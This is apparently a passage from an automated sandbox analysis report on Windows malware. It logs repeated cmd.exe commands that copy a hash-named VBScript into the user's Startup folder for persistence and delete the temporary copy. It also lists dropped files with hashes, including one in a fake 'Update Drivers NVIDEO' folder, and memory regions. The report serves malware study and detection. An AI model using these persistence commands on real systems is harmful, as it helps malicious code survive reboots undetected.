                                                              cmd.exe /c copy "C:\Users\Admin\AppData\Local\Temp\bbe996677004e41892ef43be26231157cda3f364730f1af522dbdca9816e03a3.vbs" "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\bbe996677004e41892ef43be26231157cda3f364730f1af522dbdca9816e03a3.vbs"
                                                              4⤵
                                                                PID:4508
                                                              • C:\Windows\SYSTEM32\cmd.exe
                                                                cmd.exe /c del "C:\Users\Admin\AppData\Local\Temp\bbe996677004e41892ef43be26231157cda3f364730f1af522dbdca9816e03a3.vbs"
                                                                4⤵
                                                                  PID:3360
                                                                • C:\Windows\SYSTEM32\cmd.exe
                                                                  cmd.exe /c copy "C:\Users\Admin\AppData\Local\Temp\bbe996677004e41892ef43be26231157cda3f364730f1af522dbdca9816e03a3.vbs" "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\bbe996677004e41892ef43be26231157cda3f364730f1af522dbdca9816e03a3.vbs"
                                                                  4⤵
                                                                    PID:2432
                                                                  • C:\Windows\SYSTEM32\cmd.exe
                                                                    cmd.exe /c del "C:\Users\Admin\AppData\Local\Temp\bbe996677004e41892ef43be26231157cda3f364730f1af522dbdca9816e03a3.vbs"
                                                                    4⤵
                                                                      PID:2036
                                                                    • C:\Windows\SYSTEM32\cmd.exe
                                                                      cmd.exe /c copy "C:\Users\Admin\AppData\Local\Temp\bbe996677004e41892ef43be26231157cda3f364730f1af522dbdca9816e03a3.vbs" "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\bbe996677004e41892ef43be26231157cda3f364730f1af522dbdca9816e03a3.vbs"
                                                                      4⤵
                                                                        PID:2292
                                                                      • C:\Windows\SYSTEM32\cmd.exe
                                                                        cmd.exe /c del "C:\Users\Admin\AppData\Local\Temp\bbe996677004e41892ef43be26231157cda3f364730f1af522dbdca9816e03a3.vbs"
                                                                        4⤵
                                                                          PID:5100
                                                                        • C:\Windows\SYSTEM32\cmd.exe
                                                                          cmd.exe /c copy "C:\Users\Admin\AppData\Local\Temp\bbe996677004e41892ef43be26231157cda3f364730f1af522dbdca9816e03a3.vbs" "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\bbe996677004e41892ef43be26231157cda3f364730f1af522dbdca9816e03a3.vbs"
                                                                          4⤵
                                                                            PID:4916
                                                                          • C:\Windows\SYSTEM32\cmd.exe
                                                                            cmd.exe /c del "C:\Users\Admin\AppData\Local\Temp\bbe996677004e41892ef43be26231157cda3f364730f1af522dbdca9816e03a3.vbs"
                                                                            4⤵
                                                                              PID:2700
                                                                            • C:\Windows\SYSTEM32\cmd.exe
                                                                              cmd.exe /c copy "C:\Users\Admin\AppData\Local\Temp\bbe996677004e41892ef43be26231157cda3f364730f1af522dbdca9816e03a3.vbs" "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\bbe996677004e41892ef43be26231157cda3f364730f1af522dbdca9816e03a3.vbs"
                                                                              4⤵
                                                                                PID:872
                                                                              • C:\Windows\SYSTEM32\cmd.exe
                                                                                cmd.exe /c del "C:\Users\Admin\AppData\Local\Temp\bbe996677004e41892ef43be26231157cda3f364730f1af522dbdca9816e03a3.vbs"
                                                                                4⤵
                                                                                  PID:2628
                                                                                • C:\Windows\SYSTEM32\cmd.exe
                                                                                  cmd.exe /c copy "C:\Users\Admin\AppData\Local\Temp\bbe996677004e41892ef43be26231157cda3f364730f1af522dbdca9816e03a3.vbs" "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\bbe996677004e41892ef43be26231157cda3f364730f1af522dbdca9816e03a3.vbs"
                                                                                  4⤵
                                                                                    PID:3952
                                                                                  • C:\Windows\SYSTEM32\cmd.exe
                                                                                    cmd.exe /c del "C:\Users\Admin\AppData\Local\Temp\bbe996677004e41892ef43be26231157cda3f364730f1af522dbdca9816e03a3.vbs"
                                                                                    4⤵
                                                                                      PID:740
                                                                                    • C:\Windows\SYSTEM32\cmd.exe
                                                                                      cmd.exe /c copy "C:\Users\Admin\AppData\Local\Temp\bbe996677004e41892ef43be26231157cda3f364730f1af522dbdca9816e03a3.vbs" "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\bbe996677004e41892ef43be26231157cda3f364730f1af522dbdca9816e03a3.vbs"
                                                                                      4⤵
                                                                                        PID:2952
                                                                                      • C:\Windows\SYSTEM32\cmd.exe
                                                                                        cmd.exe /c del "C:\Users\Admin\AppData\Local\Temp\bbe996677004e41892ef43be26231157cda3f364730f1af522dbdca9816e03a3.vbs"
                                                                                        4⤵
                                                                                          PID:552
                                                                                        • C:\Windows\SYSTEM32\cmd.exe
                                                                                          cmd.exe /c copy "C:\Users\Admin\AppData\Local\Temp\bbe996677004e41892ef43be26231157cda3f364730f1af522dbdca9816e03a3.vbs" "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\bbe996677004e41892ef43be26231157cda3f364730f1af522dbdca9816e03a3.vbs"
                                                                                          4⤵
                                                                                            PID:4084
                                                                                          • C:\Windows\SYSTEM32\cmd.exe
                                                                                            cmd.exe /c del "C:\Users\Admin\AppData\Local\Temp\bbe996677004e41892ef43be26231157cda3f364730f1af522dbdca9816e03a3.vbs"
                                                                                            4⤵
                                                                                              PID:4468

                                                                                      Network

                                                                                      MITRE ATT&CK Enterprise v15

                                                                                      Replay Monitor

                                                                                      Loading Replay Monitor...

                                                                                      Downloads

                                                                                      • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

                                                                                        Filesize

                                                                                        2KB

                                                                                        MD5

                                                                                        d85ba6ff808d9e5444a4b369f5bc2730

                                                                                        SHA1

                                                                                        31aa9d96590fff6981b315e0b391b575e4c0804a

                                                                                        SHA256

                                                                                        84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f

                                                                                        SHA512

                                                                                        8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

                                                                                      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                        Filesize

                                                                                        944B

                                                                                        MD5

                                                                                        77d622bb1a5b250869a3238b9bc1402b

                                                                                        SHA1

                                                                                        d47f4003c2554b9dfc4c16f22460b331886b191b

                                                                                        SHA256

                                                                                        f97ff12a8abf4bf88bb6497bd2ac2da12628c8847a8ba5a9026bdbb76507cdfb

                                                                                        SHA512

                                                                                        d6789b5499f23c9035375a102271e17a8a82e57d6f5312fa24242e08a83efdeb8becb7622f55c4cf1b89c7d864b445df11f4d994cf7e2f87a900535bcca12fd9

                                                                                      • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_sq4mdxob.pbr.ps1

                                                                                        Filesize

                                                                                        60B

                                                                                        MD5

                                                                                        d17fe0a3f47be24a6453e9ef58c94641

                                                                                        SHA1

                                                                                        6ab83620379fc69f80c0242105ddffd7d98d5d9d

                                                                                        SHA256

                                                                                        96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

                                                                                        SHA512

                                                                                        5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

                                                                                      • C:\Users\Admin\AppData\Roaming\Program Rules NVIDEO\Update Drivers NVIDEO\Update Drivers NVIDEO\Update Drivers NVIDEO\server.txt

                                                                                        Filesize

                                                                                        355B

                                                                                        MD5

                                                                                        daa58b938ebe73e880b2cdd8704c6301

                                                                                        SHA1

                                                                                        857c5eaf94dfeb56ba44ac70685c6787a846549c

                                                                                        SHA256

                                                                                        50bae474c92c50383c3e65183eed42e3c05d134b0baf0f5cf6f8095f362f5ee6

                                                                                        SHA512

                                                                                        53d127cf5afe697a77b9ff1658673295be80fbbcc24e8fa5b28d39ce7dd158ddfe1d7e756f189280fb965881a6ff1764ddb0e74325eb24574b1cb466039e999e

                                                                                      • memory/1516-22-0x000001C8EC330000-0x000001C8EC33A000-memory.dmp

                                                                                        Filesize

                                                                                        40KB

                                                                                      • memory/2728-0-0x00007FFDDFB53000-0x00007FFDDFB55000-memory.dmp

                                                                                        Filesize

                                                                                        8KB

                                                                                      • memory/2728-10-0x000001BDE2350000-0x000001BDE2372000-memory.dmp

                                                                                        Filesize

                                                                                        136KB

                                                                                      • memory/2728-11-0x00007FFDDFB50000-0x00007FFDE0611000-memory.dmp

                                                                                        Filesize

                                                                                        10.8MB

                                                                                      • memory/2728-12-0x00007FFDDFB50000-0x00007FFDE0611000-memory.dmp

                                                                                        Filesize

                                                                                        10.8MB

                                                                                      • memory/2728-49-0x00007FFDDFB53000-0x00007FFDDFB55000-memory.dmp

                                                                                        Filesize

                                                                                        8KB

                                                                                      • memory/2728-50-0x00007FFDDFB50000-0x00007FFDE0611000-memory.dmp

                                                                                        Filesize

                                                                                        10.8MB